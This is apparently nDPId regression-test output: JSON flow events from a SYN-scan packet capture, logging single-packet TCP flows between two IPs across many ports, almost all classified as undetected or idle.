-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5050,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1688,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1688,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":739,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5051,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":739,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5051,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1769,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1769,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":816,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5051,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":816,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5051,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":613,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":613,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1696,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1696,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":684,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":684,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1761,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1761,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1584,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5054,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1584,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5054,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":806,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3006,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":806,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7103,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1666,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5054,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1666,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5054,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":869,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3007,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":869,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":849,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3006,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":849,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1751,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7103,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1751,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":936,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3007,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":936,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1042,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7106,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1042,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1689,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3011,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1689,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7106,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1768,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3011,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1768,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":889,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5060,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":889,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1849,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3013,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 